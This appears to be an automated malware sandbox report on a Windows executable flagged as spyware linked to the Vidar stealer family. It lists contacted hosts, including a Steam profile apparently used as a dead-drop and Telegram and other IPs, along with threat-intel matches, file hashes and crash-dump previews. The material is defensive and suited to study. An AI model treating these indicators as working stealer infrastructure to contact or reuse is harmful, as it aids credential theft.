https://steamcommunity.com/profiles/76561199786602107vR. | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://store.steampowered.com/ | 76561199786602107[1].htm.0.dr | false | URL Reputation: safe | unknown
http://127.0.0.1:27060 | aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://cowod.oudflare | aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp | false | | unknown
https://steamcommunity.com/profiles/76561199786602107/badges | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1948655948.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | 76561199786602107[1].htm.0.dr | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
65.109.142.154 | unknown | United States | 11022 | ALABANZA-BALTUS | false
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false
                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                  Analysis ID:1538067
                                                                                                                                                                  Start date and time:2024-10-20 08:34:06 +02:00
                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                  Overall analysis duration:0h 4m 53s
                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                  Report type:full
                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                  Technologies:
                                                                                                                                                                  • HCA enabled
                                                                                                                                                                  • EGA enabled
                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                  Sample name:aZm1EZ2IYr.exe
                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                  Original Sample Name:1e1d5412616216fd90ea3cb6a87353db.exe
                                                                                                                                                                  Detection:MAL
                                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/11@3/3
                                                                                                                                                                  EGA Information:
                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                  HCA Information:
                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                  • Number of executed functions: 47
                                                                                                                                                                  • Number of non-executed functions: 102
                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 104.208.16.94
                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
02:35:26 | API Interceptor | 1x Sleep call for process: aZm1EZ2IYr.exe modified
02:35:34 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.102.49.254 | http://gtm-cn-j4g3qqvf603.steamproxy1.com/ | malicious | Unknown | www.valvesoftware.com/legal.htm
65.109.142.154 | Unlock_Tool_2.4.exe | malicious | Vidar |
65.109.142.154 | yAkRyU2LPe.exe | malicious | Vidar |
149.154.167.99 | http://xn--r1a.website/s/ogorodru | malicious | Unknown | telegram.org/img/favicon.ico
149.154.167.99 | http://cryptorabotakzz.com/ | malicious | Unknown | telegram.org/
149.154.167.99 | http://cache.netflix.com.id1.wuush.us.kg/ | malicious | Unknown | telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                      http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.org/
                                                                                                                                                                      http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.org/
                                                                                                                                                                      http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.org/?setln=pl
                                                                                                                                                                      http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.org/
                                                                                                                                                                      http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.dog/
                                                                                                                                                                      LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                      • t.me/cinoshibot
                                                                                                                                                                      jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                      • t.me/cinoshibot
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      t.meUnlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      SecuriteInfo.com.Win32.DropperX-gen.7855.32539.exeGet hashmaliciousXehook StealerBrowse
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      https://njanimallaw.com/divorce-family-law/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 162.241.217.237
                                                                                                                                                                      https://linkifly.net/TRACKINGGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 50.6.153.232
                                                                                                                                                                      https://hwu.iaa.mybluehost.me/vvvop/SEEKKK/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 50.6.153.232
                                                                                                                                                                      nvANxkZUSC.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                      • 194.120.230.54
                                                                                                                                                                      http://7xv6.mjt.lu/lnk/AXMAAFFvlI0AAAAAAAAAA8Ye8moAAABKhgwAAAAAAAq7pgBnByOSeYt8cGpTTPaPBTAKJeV-UQAKnpI/1/EWmySlSHcyP6g54g0SDc-g/aHR0cHM6Ly9zbmlwLmx5L2V6NGxydwGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 50.6.153.26
                                                                                                                                                                      steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      cH4EGgNUR7.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      6FecO9d3l9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      2WWOAq4c3b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      EY2raBetTi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      S3AYU5t2JP.exeGet hashmaliciousLummaC, Amadey, StealcBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      PTc16LnPI5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      yRMHuXP8fH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      TELEGRAMRUUnlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      PROFOMA INVOICE 90021144577.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      routcrying.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      mnobizx.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      mnobizx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      SecuriteInfo.com.Win32.DropperX-gen.7855.32539.exeGet hashmaliciousXehook StealerBrowse
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      rcota____oRFQNO-N__merodopedido106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      SecuriteInfo.com.Win64.Malware-gen.32485.11504.exeGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Wuerth_factura_4052073226..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      KIDy5J5su4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      ALABANZA-BALTUSUnlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      yAkRyU2LPe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      y45bCpZY1I.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.241.236
                                                                                                                                                                      xy894fdlWJ.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.241.236
                                                                                                                                                                      yakuza.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 64.176.208.213
                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.241.236
                                                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 65.109.241.236
                                                                                                                                                                      PURCHASE_ORDER.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                                                                                      • 64.176.178.205
                                                                                                                                                                      http://nndpdnm.3utilities.com/#bd5on/p8la73b/LoiU9/1oQd1tRDE-SUREIDANt92YuMXZpJHZuV3bmxWYi9GbnBUY5hGZhBHc15Cdp1WYGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                      • 65.108.133.178
                                                                                                                                                                      ZRemI0ixC6.dllGet hashmaliciousBumbleBeeBrowse
                                                                                                                                                                      • 65.108.214.195
                                                                                                                                                                      AKAMAI-ASUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      cH4EGgNUR7.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      6FecO9d3l9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      2WWOAq4c3b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      EY2raBetTi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      S3AYU5t2JP.exeGet hashmaliciousLummaC, Amadey, StealcBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      PTc16LnPI5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      yRMHuXP8fH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      51c64c77e60f3980eea90869b68c58a8Unlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      yAkRyU2LPe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      y45bCpZY1I.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      xy894fdlWJ.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      EP2E1yYJyT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      9evHLnwull.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      tiCW7a3x1P.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exeGet hashmaliciousVidar, XmrigBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19Unlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      JuyR4wj8av.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                      • 104.102.49.254
• 149.154.167.99
SecuriteInfo.com.FileRepMalware.4445.21502.exe  malicious  Unknown
• 104.102.49.254
• 149.154.167.99
yAkRyU2LPe.exe  malicious  Vidar
• 104.102.49.254
• 149.154.167.99
EL7ggW7AdA.exe  malicious  Stealc, Vidar
• 104.102.49.254
• 149.154.167.99
y45bCpZY1I.exe  malicious  Vidar
• 104.102.49.254
• 149.154.167.99
xy894fdlWJ.exe  malicious  Vidar
• 104.102.49.254
• 149.154.167.99
SecuriteInfo.com.Win32.Evo-gen.14702.4787.exe  malicious  KoiLoader
• 104.102.49.254
• 149.154.167.99
4b7b5bc7b0d1f70adf6b80390f1273723c409b837c957.dll  malicious  Unknown
• 104.102.49.254
• 149.154.167.99
Megrendel#U00e9s 202401378.vbs  malicious  FormBook, GuLoader
• 104.102.49.254
• 149.154.167.99
No context
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):1.1603036054723175
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:gGSlvLZsHW0BU/Yj7UZr2QhmdzuiF7Z24IO83H:ulvLiH9BU/YjZtdzuiF7Y4IO83H
                                                                                                                                                                      MD5:7BD11AEC86DE96C53A821C5E744610CF
                                                                                                                                                                      SHA1:9C4CD0EA674D12D6AC13C71AFBA6D283A71566BF
                                                                                                                                                                      SHA-256:0623C8DF17E6BB3257698FFF66A3A6ADFE827FBE032D38B2ED606FCCC323B575
                                                                                                                                                                      SHA-512:A7D9FC1524AFBAC981828B9D711DFEDE2C250C8B69247DB91D136DF84126C59371A636F2B8E9BF27B1CF4C139903D4F9E97AE8A19DB5481D8A372882910F2018
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.8.7.9.7.2.8.0.9.6.2.2.2.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.8.7.9.7.2.9.2.8.3.7.3.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.d.4.3.e.3.d.9.-.5.d.0.4.-.4.3.2.0.-.9.1.f.6.-.e.2.9.2.0.4.6.f.1.0.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.a.0.7.f.2.d.4.-.9.e.3.1.-.4.6.1.e.-.9.9.e.f.-.e.b.5.d.3.6.5.0.8.2.b.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.a.Z.m.1.E.Z.2.I.Y.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.a.8.-.0.0.0.1.-.0.0.1.4.-.a.7.5.4.-.f.4.2.d.b.a.2.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.d.1.0.1.3.7.d.e.d.5.c.d.7.d.c.1.e.9.a.e.a.5.e.f.4.2.f.d.4.1.5.0.0.0.0.f.f.f.f.!.0.0.0.0.d.a.0.a.e.9.9.a.e.b.b.d.e.6.4.3.3.c.8.d.c.9.8.5.e.8.c.8.b.2.3.0.5.c.d.b.9.b.5.4.!.a.Z.m.1.E.Z.2.I.Y.r...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):1.1389179810418568
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:4l4LUzHW0JnFwj7UZr2Qhm4zuiF7Z24IO83HiB:4l4LgH9JnFwjZt4zuiF7Y4IO83HiB
                                                                                                                                                                      MD5:BB0DE6E437D966CA7BB36BB2CAA0CDC2
                                                                                                                                                                      SHA1:E89F00E9D12A2016E643CEBEBE2F7FC4130317AE
                                                                                                                                                                      SHA-256:4D9F4F84C28B6EA5D549E09EABE73CCB5D8204AC4AC075B8C9595C09895AE519
                                                                                                                                                                      SHA-512:8F63B22FF23889CB5768A7B767F69C44A58541858AC8F53E1215421E742674A022146970526567784CE0C23DC410829CD571BED0D30FC87BDDA8C4969252497E
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.8.7.9.7.2.7.0.1.8.1.1.0.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.2.5.a.f.4.9.-.0.a.9.f.-.4.1.f.3.-.8.1.9.f.-.e.c.a.3.1.d.f.3.b.7.4.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.9.e.e.4.c.c.-.c.3.6.b.-.4.2.7.b.-.b.d.5.3.-.7.2.f.0.d.1.3.4.f.d.a.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.a.Z.m.1.E.Z.2.I.Y.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.a.8.-.0.0.0.1.-.0.0.1.4.-.a.7.5.4.-.f.4.2.d.b.a.2.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.d.1.0.1.3.7.d.e.d.5.c.d.7.d.c.1.e.9.a.e.a.5.e.f.4.2.f.d.4.1.5.0.0.0.0.f.f.f.f.!.0.0.0.0.d.a.0.a.e.9.9.a.e.b.b.d.e.6.4.3.3.c.8.d.c.9.8.5.e.8.c.8.b.2.3.0.5.c.d.b.9.b.5.4.!.a.Z.m.1.E.Z.2.I.Y.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.2.0.:.0.3.:.3.2.!.5.f.e.8.2.!.a.Z.m.1.E.Z.2.I.Y.r...e.x.e.....B.o.o.t.
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Sun Oct 20 06:35:27 2024, 0x1205a4 type
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):174320
                                                                                                                                                                      Entropy (8bit):1.9767900190997831
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:SPtKwUdRXutXhVv2g53GVbW7kQZ9IDxQ0XznwZuMLtYAAnFqW/agyOFPP:YgwtxJ53GVbWwQZ9Qx77S5tWagyOh
                                                                                                                                                                      MD5:A86FE3F84FA1E496D9C529808CBD0A33
                                                                                                                                                                      SHA1:E7ED2A84B9B86693E24DADBB4A54BD37E3333705
                                                                                                                                                                      SHA-256:C08843040DAE459F3361A181BDE0FC8AE6402F45DBBF020DE50999902BF0E89E
                                                                                                                                                                      SHA-512:303E1AFD42BD6F713351F12D0792B1A14C12B74A80597CC334669FEDD250662C9FA03EAE56E0E98D0880330B62454D42424C487D433DFD584A5D4FDE28480EE1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:MDMP..a..... ..........g......................... ..(.......$....)......d....V..........`.......8...........T...........xV..xR...........)...........+..............................................................................eJ......P,......GenuineIntel............T..............g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8352
                                                                                                                                                                      Entropy (8bit):3.6986790189691052
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:R6l7wVeJYS6TQ6Y9nSUPgmfSaK/p0t89bAi1fQgm:R6lXJ16TQ6YtSUPgmfSaKNAYfu
                                                                                                                                                                      MD5:DB6C2483F54C89F5E72CFFE005705994
                                                                                                                                                                      SHA1:16377F57072EC673A3C4AE294A544263E1985327
                                                                                                                                                                      SHA-256:BF93910DC9FC3661F3CC49DE45D26A453A8EFC58CC532D193C4E92114E1E9568
                                                                                                                                                                      SHA-512:9F6DF3C4F90E2E87AC4CCDC066BC55480DE37D4CFCCE59DC9488D7EA6DF0F1CE41F183DF66A067AAF0E1242DC617B39A1288CA68D6574B3C43A683E54583F232
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.3.6.<./.P.i.
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4593
                                                                                                                                                                      Entropy (8bit):4.466544294519342
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:uIjfxnI7NR7V6JGLDsO5aI05uZ92uq2ukd:uItnYNR70yOQUK
                                                                                                                                                                      MD5:AF77C37E0D21EEA8C2DD614FF1109618
                                                                                                                                                                      SHA1:5CE4CB2224265414F634F0917CFF6D1DC3E3D1E2
                                                                                                                                                                      SHA-256:13B0412FB153CEE126B0287581A63C5C330DDAF28289BDACB29A213FE4CD6F1E
                                                                                                                                                                      SHA-512:291702554583C339CD99733D194ACBDF90411B80144F73B701A353FF7C00004FDD42F7359A9A7F1F048E95E0AE09BA647F0C6F119A93ABB657A0032C2B726A5F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="551378" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Sun Oct 20 06:35:28 2024, 0x1205a4 type
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):188078
                                                                                                                                                                      Entropy (8bit):1.9071525541392529
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:7HoGXdRle3sj9aEc+QZ9IZxQUm5IJvnFqz/ZI8UJZ:7Ho3GsEc+QZ92xDm5IJvWZI3J
                                                                                                                                                                      MD5:D0FF1FCCBE1C337AA132BB4FFDD87FBA
